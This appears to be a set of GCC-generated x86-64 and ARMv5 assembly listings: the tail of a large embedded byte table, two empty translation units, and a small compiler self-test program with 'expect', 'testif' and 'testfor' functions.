"\337\342\324\327\335\330\341\344\340\363\373\001\007" .ascii "\000\002\021\034\022\034\026\026!\023\025\031\026\017" .ascii "\026\015\011\013\010\010\004\370\004\010\363\376\376" .ascii "\375\361\005\367\355\367\343\370\350\340\353\331\335" .ascii "\331\327\336\323\336\342\335\334\331\362\362\346\375" .ascii "\373\366\375\377\001\002\373\377\002\366\361\367\367" .ascii "\345\354\355\346\363\351\355\366\361\000\372\006\007" .ascii "\004\012\000\003\375\003\371\357\361\351\345\342\347" .ascii "\340\332\340\335\333\331\332\334\336\334\344\344\327" .ascii "\345\354\356\362\356\367\004\356\373\005\362\377\371" .ascii "\367\375\004\006\012\001\000\000\007\004\015%\034 '" .ascii "444453--2\037\025\014\003\025\003\006\355\355\357\330" .ascii "0*\353\037\037\005\3670.\033;\001\372\005\011\315$\376" .ascii "\314\006\326\004\333\342\032;\354\347\372\017\016\311" .ascii "\303\255\307\313\001\006\007\023\341\004\364\354\371" .ascii "\362\011\357\370\344\364\373\002\010\365\367\01502<" .ascii "\036\024\011!$1&\014\350\276\274\253\304\222\257\276" .ascii "\233\263\272\323\345\015\024#\"\025&\022\017\010\004" .ascii "\373\331\321\360\004\007\016\037\021.,\013\030\0137" .ascii "F-\031\016\026\017\004\356\364\011\376\001\352\345\370" .ascii "\022\362\305\360\351\344\332\357\351\315\356\353\344" .ascii "\343\373\022\023\026*G>H@6@7K%+;#/&=D8&\022\033$\025" .ascii "\016\372\365\362\353\340\313\340\315\332\323\311\324" .ascii "\244\256\272\270\326\346\371\373\371\010\034\022\372" .ascii "\022\021\010\025\013\017#081KBHY/'*$\021\372\340\347" .ascii "\345\314\317\306\311\336\330\323\307\314\373\330\331" .ascii "\346\347\367\315\321\314\312\332\320\303\306\322\327" .ascii "\350\357\343\376.\033\010\03585'6$\013\016\015\373\373" .ascii "\017\005\367\346\341\334\344\322\317\326\302\351\340" .ascii "\316\343\014\013\343\370\347\347\364\341\342\351\352" .ascii "\346\340\325\345\370\376\375\001\001\026\010\003\012" .ascii "\032079\017>KD>AE;-\026\021\003\377\375\361\322\355" .ascii "\354\345\332\337\357\022\373\356#\005\375\005\014\357" .ascii "\360\001\364\363\352\347\372\370\366\000\020*,/KVRi" .ascii "N7?+&\021\014\036\023\"\010\370\031 (\026\373\364\353" .ascii "\324\303\301\311\340\326\313\302\271\335\342\274\322" .ascii "\366\370\001\364\376\007\031\033\022\022\017\022\003" .ascii "\361\360\367\006\007\376\012\037.\025\021\022=-*&\376" .ascii "\025\003\026\366\344\367\361\346\336\351\361\367\361" .ascii "\345\347\361\346\345\331\310\300\323\302\273\311\333" .ascii "\316\305\315\311\335\332\351\322\326\365\001\347\332" .ascii "\320\320\327\307\306\326" .ascii "\341\370\013\376(2QHMK8F$\014\377\376\345\352\326\327" .ascii "\362\365\376\377\006\023\037\017\025 ,'\027\002\355" .ascii "\372\365\355\327\311\316\342\347\345\375\373\367\002" .ascii "\372\000\024\023\012\005\015\024\032\011\010\021\"&" .ascii "\027#59<=/<@/\037&+6*#6+//,\")1&\031\007\005\014\376" .ascii "\334\320\353\331\316\277\243\250\246\240\236\300\301" .ascii "\321\340\352\367\002\026\013\372\375\011\004\373\365" .ascii "\370\005\025#\"'9H<038A#&\036\027%\022\377\360\005\014" .ascii "\000\376\370\012\020\375\363\362\365\367\353\326\325" .ascii "\326\332\317\304\272\307\323\317\315\327\346\352\356" .ascii "\331\343\353\343\336\316\302\307\306\265\276\314\326" .ascii "\330\334\331\336\354\372\372\367\002\015$\021\011\034" .ascii "#)\034\014\024\023\016\006\002\373\004\012\355\375\010" .ascii "\027\031\013\005\010\014\007\377\364\374\001\011\376" .ascii "\370\374\006\005\371\374\366\004\020\362\353\361\371" .ascii "\001\355\336\347\005\001\367\010\022!\"#\034%,#\033" .ascii "\015\017\025\030\000\012\014\024\035\023\"3<BRPae_;" .ascii "70$!\002\006\007\001\374\374\364\377\011\003\367\355" .ascii "\345\347\327\311\311\326\331\317\312\304\333\343\337" .ascii "\335\351\355\377\372\353\375\001\020\020\017\003\015" .ascii "\022\370\361\353\365\375\006\376\000\022\031\027\016" .ascii "\025\027\026\006\006\362\000\377\354\363\334\363\374" .ascii "\363\353\355\006\033\020\017\027\026\033\024\003\366" .ascii "\372\370\353\323\326\340\333\321\320\326\337\347\340" .ascii "\344\341\347\365\343\320\322\320\314\275\273\301\315" .ascii "\320\322\330\334\362\001\370\342\360\362\366\347\327" .ascii "\336\337\326\314\325\336\357\370\001\001\023#*)+.;3" .ascii "+,\034%\025 \012\012\032\031&\024/9=5-==0&*!\034\030" .ascii "\007\375\376\003\001\366\366\376\006\004\011\005\010" .ascii "\005\015\010\377\013\004\003\375\016\025\015\016\010" .ascii "\002\016\006\001\001\366\372\010\374\351\355\365\364" .ascii "\347\336\324\332\325\325\334\343\361\006\017\022\021" .ascii "\027\"!\023\007\033\033\023\016\013\033#%*.8A:0><8)" .ascii "\031\031\017\003\371\363\355\343\345\345\334\335\346" .ascii "\347\343\341\341\343\344\332\331\335\324\332\314\307" .ascii "\311\316\327\324\316\325\342\340\331\340\344\337\343" .ascii "\327\327\315\331\335\330\324\336\353\346\351\353\365" .ascii "\370\376\374\376\000\003\005\004\000\376\005\375\362" .ascii "\373\371\364\372\366\363\375\376\001\015\007\020!\"" .ascii " \025\034\"\030\015\001\015\017\013\011\004\006\023" .ascii "\025\017\023\023\027\031\017\013\022\014\007\005\000" .ascii "\374\002\004\376\001\010\013\011\012\006\373\002\372" .ascii "\364\002\377\364\366\367\363\374\005\022\014\014\025" .ascii "\").2/0'#\033\023\020\014\376\374\000\001\000\000\001" .ascii "\012\013\011\014\006\002\363\376\365\355\374\364\370" .ascii "\375\367\376\377\375\010\007\020\021\030\035\037#-." .ascii "''*!\024\025\021\013\007\006\377\374\372\367\364\356" .ascii "\347\355\347\341\330\331\330\325\317\314\325\310\332" .ascii "\326\327\327\336\342\341\352\355\364\357\350\341\331" .ascii "\314\317\322\315\312\332\330\325\333\337\353\361\364" .ascii "\371\004\002\002\003\376\371\370\363\356\352\352\354" .ascii "\357\354\362\375\372\004\007\007\377\006\003\000\001" .ascii "\374\003\011\372\366\014\003\021\010\014\035\036\033" .ascii "\020\032\033\027\026\017\010\016\012\017\015\015\021" .ascii "\016\017\024\024\023\032\032\030\026\030\023\020\012" .ascii "\000\006\373\365\372\365\362\366\370\365\365\001\000" .ascii "\002\004\013\034\025\020\017\030\027\026\034\027\017" .ascii "\017\025\021\012\013\016\016\016\012\011\010\007\010" .ascii "\004\004\377\375\373\357\352\351\345\341\343\346\357" .ascii "\361\367\375\377\000\007\021\017\017\013\025\026\025" .ascii "\034!-,3:/6615/\"\032\020\010\014\001\363\356\360\354" .ascii "\357\351\347\355\354\360\361\355\354\362\355\352\352" .ascii "\350\343\342\335\331\333\325\325\326\324\321\324\331" .ascii "\323\333\330\335\331\320\335\331\343\340\343\335\336" .ascii "\344\344\352\341\351\351\345\334\335\337\340\340\345" .ascii "\341\333\346\345\345\345\346\352\355\353\360\367\371" .ascii "\376\003\006\010\014\017\021\020\016\024\022\013\017" .ascii "\024\024\030\032\032&\"+22<260,.%*\037\037$\033\035" .ascii "\031\023\027\031\027\027\024\032\037\033\031\021\025" .ascii "\023\021\025\020\015\020\023\022\024\024\027\030\023" .ascii "\024\026\015\011\010\000\374\371\363\357\360\355\356" .ascii "\357\357\361\356\354\343\343\332\324\315\315\314\312" .ascii "\316\310\322\317\331\327\331\345\352\372\374\002\007" .ascii "\022\026\033),&%)!\037\035\025\025\017\011\016\011\005" .ascii "\010\004\002\004\005\005\005\002\003\005\002\377\004" .ascii "\000\376\002\002\374\377\000\376\375\374\002\002\372" .ascii "\367\367\364\364\361\357\357\371\364\363\372\364\374" .ascii "\374\002\004\001\002\000\374\363\360\353\341\345\345" .ascii "\327\331\336\332\337\334\337\346\346\346\353\352\346" .ascii "\351\346\342\343\343\342\341\340\343\347\346\351\360" .ascii "\362\361\367\371\374\377\002\006\013\017\017\026\022" .ascii "\024\027\030\023\025\007\374\004\025\371\356\023\011" .ascii "\004\001\0344\003\011=8\335\0068\336\321\370 \001<\361" .ascii "\007J\"/\366,>\312\330\035\251\265\321\362\353\311\312" .ascii "\351\010\005\036\323\346\000\367\347\374\336\342\345" .ascii "\262\356\320\256\265\274\310\354\370\000\017\350\353" .ascii "\335\340\335\364\350\363\011\356*!+7:\036-B.J\010\021" .ascii "\025\376\0206%(/\021\025\377\033\036!\026<'\"?\027\034" .ascii "\003\371\346\370\327\330\335\265\335\306\317\323\276" .ascii "\274\351\351\350\010\341\001\376\364\376\004\364\020" .ascii "\014\366\021\000\000\013,4f[XdTQP<(A\034\037\031\021" .ascii "\033\012\016\013\004\335\360\370\377\026\010\017\003" .ascii "\365\350\367\332\352\347\325\350\336\352\360\023\"5" .ascii "\031\032&\011\010\371\356\340\326\300\355\337\302\323" .ascii "\264\270\307\320\307\361\344\364\016\367\003\005\003" .ascii "\372\025\374\015\003\363\023\002\371\017\024\0107/A" .ascii "?0%\027\037\001 \000\015\002\332\325\302\272\300\320" .ascii "\300\354\343\371\016\005\011\001\353\341\365\312\330" .ascii "\306\263\267\277\274\317\365\325\377\366\005\011\375" .ascii "\025\006\376\364\012\360\004\367\350\364\355\356\373" .ascii "\021\0134)7@<</22F%?503'*8L-P<FD745:4J (\020\371\361" .ascii "\337\316\320\325\303\336\324\332\326\326\325\315\260" .ascii "\237\272\246\307\315\304\323\332\323\355\367\360\027" .ascii "\003#\036\031\036)2/5\025%\015\004\003\371\371\006\015" .ascii "\006)\030'.\030\034\034\004\004\032\377\030\010\377" .ascii "\376\366\361\013\026\001\034\017\030\017\006\371\376" .ascii "\345\350\366\327\351\321\303\276\274\261\315\316\277" .ascii "\336\274\274\275\255\250\257\256\264\320\317\362\356" .ascii "\361\374\006\375\376\010\001\025\360\375\374\365\366" .ascii "\004\001\377\011\364\020\375\006\003\014\010\034%&?" .ascii "0B/6'/%2-\0301$*%*\020713S0@7-%'\017\024\026\371\007" .ascii "\362\360\361\367\374\015\014\014\024\367\373\363\352" .ascii "\324\327\316\321\335\331\344\326\322\307\305\263\324" .ascii "\314\336\011\367\006\010\000\365\004\356\374\374\355" .ascii "\002\367\002\016! 778B-9- \037$\025\"\036\005\016\377" .ascii "\013\012\373\374 \033\035+\017\"\030\014\005\005\357" .ascii "\364\361\335\346\322\315\304\312\300\331\321\324\341" .ascii "\314\315\311\310\275\314\300\315\307\276\306\266\273" .ascii "\272\311\312\355\373\007\037\003\013\004\371\345\336" .ascii "\335\334\312\301\313\275\323\326\344\345\002\004\020" .ascii "\"\027(\037\037\033)\032**\"(\037-):5JJM]TT@?4E,5.\021" .ascii "!\016\022\024\020\010&\021\027&\024\031\031\036\035" .ascii "*\024\035\024\004\010\367\363\364\373\363\005\377\007" .ascii "\006\357\352\314\300\254\272\260\271\302\273\310\271" .ascii "\272\302\324\317\351\363\003\013\014\022 \027,\016" .ascii "\034\022\015\017\002\003\010\017\012$\031$&\034\036" .ascii "\032\020\013\022\376\017\010\374\365\357\363\360\357" .ascii "\354\006\364\000\002\377\372\362\365\355\001\361\006" .ascii "\367\361\376\371\374\370\005\375\015\007\377\376\361" .ascii "\347\345\333\332\345\335\352\337\334\330\315\307\310" .ascii "\306\276\317\307\323\325\315\317\326\327\334\343\344" .ascii "\366\353\365\357\353\372\372\001\006\023!,\037\037\032" .ascii "\034\023\023\034\017\037\023\022\017\010\013\024\022" .ascii "\024'\034%& \035\037\035\037,\"545FJGVXWbMTC" .ascii "6#!\030\022\032\000\006\363\346\333\312\301\313\320" .ascii "\326\344\344\367\356\362\366\365\363\372\001\372\013" .ascii "\005\014\022\021\024\034\030\025 \021\023\011\001\373" .ascii "\364\350\347\346\320\333\314\307\314\305\303\312\306" .ascii "\310\326\320\321\314\307\310\327\314\332\334\316\334" .ascii "\332\336\334\351\346\373\377\001\014\001\012\004\005" .ascii "\000\000\366\363\360\344\353\333\336\337\342\345\365" .ascii "\377\004\031\016\031\023\015\006\005\367\376\377\361" .ascii "\012\377\013\011\015\021$!&51?51(,$+\037\024\031\024" .ascii "\017\020\013\010\022\005\012\021\014\014\014\012\003" .ascii "\003\375\003\003\373\006\375\001\001\007\005\015\016" .ascii "\027 \030'!#\023\027\015\013\000\365\365\343\335\330" .ascii "\334\325\346\332\347\345\330\333\320\313\300\316\311" .ascii "\317\317\325\342\347\352\360\367\375\026\016\033/.;" .ascii "<;9<,/)\032\036\017\016\010\007\000\013\002\007\015" .ascii "\002\013\003\005\372\004\371\377\372\365\376\370\376" .ascii "\001\011\010\021\006\021\020\010\024\015\377\374\371" .ascii "\350\362\352\344\351\343\335\333\336\333\345\336\345" .ascii "\346\337\346\344\335\341\352\337\351\343\337\342\327" .ascii "\326\330\326\322\340\332\343\354\353\366\365\365\364" .ascii "\373\361\370\367\355\367\360\360\366\366\360\001\371" .ascii "\005\011\376\012\002\006\376\005\002\010\377\375\011" .ascii "\011\022\022\027\022%\033&+$)#%\036\037\023 \027\025" .ascii " \033!\"#!+\036'(\036#\036\032\025\031\007\014\374\362" .ascii "\357\345\336\343\351\354\377\372\021\015\027\032\036" .ascii "!\035(\034\"$'&(#&&$#\026\032\022\024\017\006\005\375" .ascii "\001\357\371\356\361\362\352\363\356\361\356\374\354" .ascii "\372\371\361\365\355\350\345\342\324\335\316\314\316" .ascii "\311\307\313\313\313\331\320\335\335\335\335\342\334" .ascii "\330\332\315\324\304\306\315\310\310\323\326\333\344" .ascii "\337\350\343\342\347\351\340\337\337\334\352\335\353" .ascii "\360\352\365\371\371\374\013\005\024\023\022\026\027" .ascii "\025\025\034\022\037\030\031\036\033\037($*6-:7665," .ascii ",)\033%\027\030\031\031\027\034 $2+;8:<<10-\034&\030" .ascii "\022\023\017\013\014\005\013\007\374\376\363\355\347" .ascii "\361\341\351\353\345\360\351\365\371\366\371\006\002" .ascii "\011\025\024!\037\035\033\033\016\020\014\000\005\370" .ascii "\370\364\361\360\365\361\363\375\361\373\365\362\356" .ascii "\353\340\341\333\320\327\312\314\310\315\312\324\320" .ascii "\324\336\327\342\343\341\334\343\334\335\333\327\332" .ascii "\323\330\325\332\330\332\333\334\344\333\354\351\345" .ascii "\353\356\342\347\351\334\350\331\332\333\330\333\346" .ascii "\341\355\366\363\005\004\005\012\020\004\017\017\014" .ascii "\027\015\026\033\034\037*)/72:6522&*$\033!\027\031\027" .ascii "\032\031!\035#+'/,--/(1+%/$'\"%#\"\036#!\032\"\032\025" .ascii "\022\020\377\373\356\345\340\322\332\323\324\325\340" .ascii "\337\346\363\360\375\375\376\000\005\001\015\012\012" .ascii "\024\013\021\022\023\016\032\021\022\026\016\021\010" .ascii "\005\377\374\356\361\347\337\337\326\327\324\325\323" .ascii "\334\325\336\343\340\347\344\347\345\346\334\343\331" .ascii "\326\334\323\325\322\327\327\342\334\346\347\343\362" .ascii "\350\352\353\344\334\342\325\324\327\316\323\331\333" .ascii "\332\343\336\351\346\336\345\345\346\344\352\343\355" .ascii "\347\355\371\363\373\003\007\013\033\025&-279879" .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "661454.c" .intel_syntax noprefix .text .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "661454.c" .text .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "123308.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "Failed" .LC1: .string " %d expected, but got %d\n" .text .globl expect .type expect, @function expect: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov DWORD PTR -4[rbp], edi mov DWORD PTR -8[rbp], esi mov eax, DWORD PTR -4[rbp] cmp eax, DWORD PTR -8[rbp] je .L2 lea rdi, .LC0[rip] call puts@PLT mov edx, DWORD PTR -8[rbp] mov eax, DWORD PTR -4[rbp] mov esi, eax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT mov edi, 1 call exit@PLT .L2: nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size expect, .-expect .globl testif1 .type testif1, @function testif1: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 97 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size testif1, .-testif1 .globl testif2 .type testif2, @function testif2: .LFB2: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 98 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE2: .size testif2, .-testif2 .globl testif3 .type testif3, @function testif3: .LFB3: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 99 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE3: .size testif3, .-testif3 .globl testif4 .type testif4, @function testif4: .LFB4: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 100 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE4: .size testif4, .-testif4 .globl testif5 .type testif5, @function testif5: .LFB5: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 101 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE5: .size testif5, .-testif5 .globl testif6 .type testif6, @function testif6: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 102 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size testif6, .-testif6 .globl testif7 .type testif7, @function testif7: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 103 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size testif7, .-testif7 .globl testif8 .type testif8, @function testif8: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 104 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size testif8, .-testif8 .globl testif9 .type testif9, @function testif9: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 105 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size testif9, .-testif9 .globl testif10 .type testif10, @function testif10: .LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 106 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size testif10, .-testif10 .globl testif .type testif, @function testif: .LFB11: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 0 call testif1 mov esi, eax mov edi, 97 call expect mov eax, 0 call testif2 mov esi, eax mov edi, 98 call expect mov eax, 0 call testif3 mov esi, eax mov edi, 99 call expect mov eax, 0 call testif4 mov esi, eax mov edi, 100 call expect mov eax, 0 call testif5 mov esi, eax mov edi, 101 call expect mov eax, 0 call testif6 mov esi, eax mov edi, 102 call expect mov eax, 0 call testif7 mov esi, eax mov edi, 103 call expect mov eax, 0 call testif8 mov esi, eax mov edi, 104 call expect mov eax, 0 call testif9 mov esi, eax mov edi, 105 call expect mov eax, 0 call testif10 mov esi, eax mov edi, 106 call expect nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE11: .size testif, .-testif .globl testfor .type testfor, @function testfor: .LFB12: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov DWORD PTR -4[rbp], 0 mov DWORD PTR -8[rbp], 0 jmp .L25 .L26: mov eax, DWORD PTR -8[rbp] add DWORD PTR -4[rbp], eax add DWORD PTR -8[rbp], 1 .L25: cmp DWORD PTR -8[rbp], 4 jle .L26 mov eax, DWORD PTR -4[rbp] mov esi, eax mov edi, 10 call expect mov DWORD PTR -4[rbp], 0 mov DWORD PTR -8[rbp], 0 jmp .L27 .L28: mov eax, DWORD PTR -8[rbp] add DWORD PTR -4[rbp], eax add DWORD PTR -8[rbp], 1 .L27: cmp DWORD PTR -8[rbp], 4 jle .L28 mov eax, DWORD PTR -4[rbp] mov esi, eax mov edi, 10 call expect nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE12: .size testfor, .-testfor .globl main .type main, @function main: .LFB13: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 0 call testif mov eax, 0 call testfor mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE13: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "123308.c" .text .section .rodata .align 2 .LC0: .ascii "Failed\000" .align 2 .LC1: .ascii " %d expected, but got %d\012\000" .text .align 2 .global expect .syntax unified .arm .fpu softvfp .type expect, %function expect: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] str r1, [fp, #-12] ldr r2, [fp, #-8] ldr r3, [fp, #-12] cmp r2, r3 beq .L2 ldr r0, .L3 bl puts ldr r2, [fp, #-12] ldr r1, [fp, #-8] ldr r0, .L3+4 bl printf mov r0, #1 bl exit .L2: nop mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L4: .align 2 .L3: .word .LC0 .word .LC1 .size expect, .-expect .align 2 .global testif1 .syntax unified .arm .fpu softvfp .type testif1, %function testif1: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #97 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size testif1, .-testif1 .align 2 .global testif2 .syntax unified .arm .fpu softvfp .type testif2, %function testif2: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #98 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size testif2, .-testif2 .align 2 .global testif3 .syntax unified .arm .fpu softvfp .type testif3, %function testif3: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #99 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size testif3, .-testif3 .align 2 .global testif4 .syntax unified .arm .fpu softvfp .type testif4, %function testif4: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #100 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size testif4, .-testif4 .align 2 .global testif5 .syntax unified .arm .fpu softvfp .type testif5, %function testif5: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #101 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size testif5, .-testif5 .align 2 .global testif6 .syntax unified .arm .fpu softvfp .type testif6, %function testif6: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #102 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size testif6, .-testif6 .align 2 .global testif7 .syntax unified .arm .fpu softvfp .type testif7, %function testif7: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #103 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size testif7, .-testif7 .align 2 .global testif8 .syntax unified .arm .fpu softvfp .type testif8, %function testif8: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #104 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size testif8, .-testif8 .align 2 .global testif9 .syntax unified .arm .fpu softvfp .type testif9, %function testif9: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #105 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size testif9, .-testif9 .align 2 .global testif10 .syntax unified .arm .fpu softvfp .type testif10, %function testif10: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #106 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size testif10, .-testif10 .align 2 .global testif .syntax unified .arm .fpu softvfp .type testif, %function testif: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 bl testif1 mov r3, r0 mov r1, r3 mov r0, #97 bl expect bl testif2 mov r3, r0 mov r1, r3 mov r0, #98 bl expect bl testif3 mov r3, r0 mov r1, r3 mov r0, #99 bl expect bl testif4 mov r3, r0 mov r1, r3 mov r0, #100 bl expect bl testif5 mov r3, r0 mov r1, r3 mov r0, #101 bl expect bl testif6 mov r3, r0 mov r1, r3 mov r0, #102 bl expect bl testif7 mov r3, r0 mov r1, r3 mov r0, #103 bl expect bl testif8 mov r3, r0 mov r1, r3 mov r0, #104 bl expect bl testif9 mov r3, r0 mov r1, r3 mov r0, #105 bl expect bl testif10 mov r3, r0 mov r1, r3 mov r0, #106 bl expect nop mov r0, r3 pop {fp, pc} .size testif, .-testif .align 2 .global testfor .syntax unified .arm .fpu softvfp .type testfor, %function testfor: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 mov r3, #0 str r3, [fp, #-8] mov r3, #0 str r3, [fp, #-12] b .L27 .L28: ldr r2, [fp, #-8] ldr r3, [fp, #-12] add r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L27: ldr r3, [fp, #-12] cmp r3, #4 ble .L28 ldr r1, [fp, #-8] mov r0, #10 bl expect mov r3, #0 str r3, [fp, #-8] mov r3, #0 str r3, [fp, #-12] b .L29 .L30: ldr r2, [fp, #-8] ldr r3, [fp, #-12] add r3, r2, r3 str r3, [fp, #-8] ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L29: ldr r3, [fp, #-12] cmp r3, #4 ble .L30 ldr r1, [fp, #-8] mov r0, #10 bl expect nop mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size testfor, .-testfor .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 bl testif bl testfor mov r3, #0 mov r0, r3 pop {fp, pc} .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
